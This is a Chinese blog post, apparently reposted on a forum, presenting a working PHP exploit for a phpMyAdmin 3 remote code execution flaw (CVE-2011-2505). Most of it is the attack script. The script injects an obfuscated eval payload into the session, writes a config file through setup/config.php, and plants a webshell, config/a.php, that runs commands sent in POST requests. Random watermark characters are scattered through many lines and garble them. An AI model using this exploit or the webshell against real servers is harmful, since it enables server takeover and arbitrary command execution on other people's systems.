phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。

昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。
2 k# ]1 s" ?0 ?  X
首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
3 H; V1 K- j5 w- W' c' x& t9 ]* F当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。

在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

9 I$ B# X4 Q* S) m* J* r# p. m于是写了这个php版本的exp，代码如下：

$ ~& W  z7 _6 x4 B: O9 A- R# p# q#!/usr/bin/php
<?php
6 ?  T6 ?, b# i+ P5 ?print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
/ k4 |7 |8 H" U( y! R* ~by oldjun(www.oldjun.com)
welcome to www.t00ls.net
3 [7 D* H3 g& C. Wmail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
3 N- |' @, E6 F' ~+ v, U');

# O! q0 _% s* t# H+ e1 Y* s% E. w/**
* working when the directory:"config" exists and is writeable.
  u/ F2 m9 c/ @4 k**/
7 j1 b1 x6 r9 M) L
. ?9 W4 C" a$ `& Y/ [2 Vif ($argc < 3) {
    print_r('
- S0 F0 U& r: e5 p% J. h' C9 b+---------------------------------------------------------------------------+
5 u  x! g9 V9 f- N# i+ mUsage: php '.$argv[0].' host path
host:      target server (ip/hostname)
. N# e- d/ a9 N7 }path:      path to pma3
: C# Z2 Y& b, G1 V5 NExample:
5 i2 g! |3 A, X! mphp '.$argv[0].' localhost /pma/
- n. V0 Z8 q9 f( r6 S, C" C+---------------------------------------------------------------------------+
');
    exit;
" ~& d2 ]3 i6 ~, v}
6 i5 ?4 X, l8 ]/ d
$host = $argv[1];
$path = $argv[2];
# k; ~* v8 m( V" E7 ?8 A( d
" P% m$ x+ b& X/**
$ U$ d6 V7 {: C5 i& M * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$ d2 T2 U5 M+ n; h$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
* L9 p, r4 o2 K$ P. g}
; Q: Z0 p- |3 G0 o2 R
3 R( z7 H$ p; ]1 S- b/ Y- M" [/**
* Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
1 e0 B- h  X- Qif($token && $sessionid){
    echo "[+] tokentoken\n";
4 ^; g5 ?! C" e1 R% H% G+ a    echo "[+] Session IDsessionid\n";
}else{
5 T, g& `# t- d& n0 z5 t    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

* @, x0 W4 H; {/**
0 @2 r! }1 U! d * Try to insert shell into session
. p- F+ n7 p6 @0 L) r/ U% L: f8 `**/
5 s  d5 o( A) }- g- Yecho "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
" J: p- e) s( o: D' p) A
# k$ V. O* X, {; ]. t/**
+ [. s* a; t2 L1 `. B * Try to create webshell
+ ^5 t! m$ K- g( A: I**/
6 r4 v& d- t- j# K2 t. x7 T# `echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
* B- Z8 I0 V& _- n- u  _7 D, F/**
/ B1 {5 v* v) H1 P+ a7 E * Try to check if the webshell was created successfully
' Q8 F& q* L) S5 a* H! N# P1 ?**/
5 M. m/ U& i1 d) mecho "[+] Try to check if the webshell was created successfully....\n";
. ^. @) P# S+ h$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
9 q9 P. y. \' K9 V( v, l    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
; O! U' d$ ~4 k! T5 v* a}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
3 g" U. |% f) Y1 G+ G}

function php_request($url,$data='',$cookie=''){
    global  $host, $path;
  h8 n; U# G7 ^% ~5 d1 e7 M   
    $method=$data?'POST':'GET';
3 b( h3 g# J3 \6 ?* b: b% b   
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
; M, W% \: f' _( B- O, m    $packet .= "Accept: */*\r\n";
7 Z+ {# M$ \( I. D5 f2 g    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
5 U' q* q2 _: e" Z    $packet .= "Host: $host\r\n";
( `4 Q* m4 T; ^% g6 @    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
9 i# G0 W; }# R/ _8 @% ^4 C    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

1 W% s9 X' r* v7 ]- `) e3 k3 \    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
9 \% B- N3 r1 o9 ]& {    echo 'No response from '.$host; die;
8 j6 C* D( r: U8 z1 {    }
    fputs($fp, $packet);

    $resp = '';
6 ]! i: I( ^/ E7 I
7 D/ ]( L6 }/ b- m$ J2 N* O    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

7 q$ M, {- ~2 V5 O8 \- Z2 \    return $resp;
) a* o: f1 q( K}
   
% V9 G$ y9 Q! U) a8 d% R?>
2 M8 E* a3 Z3 N6 z6 B.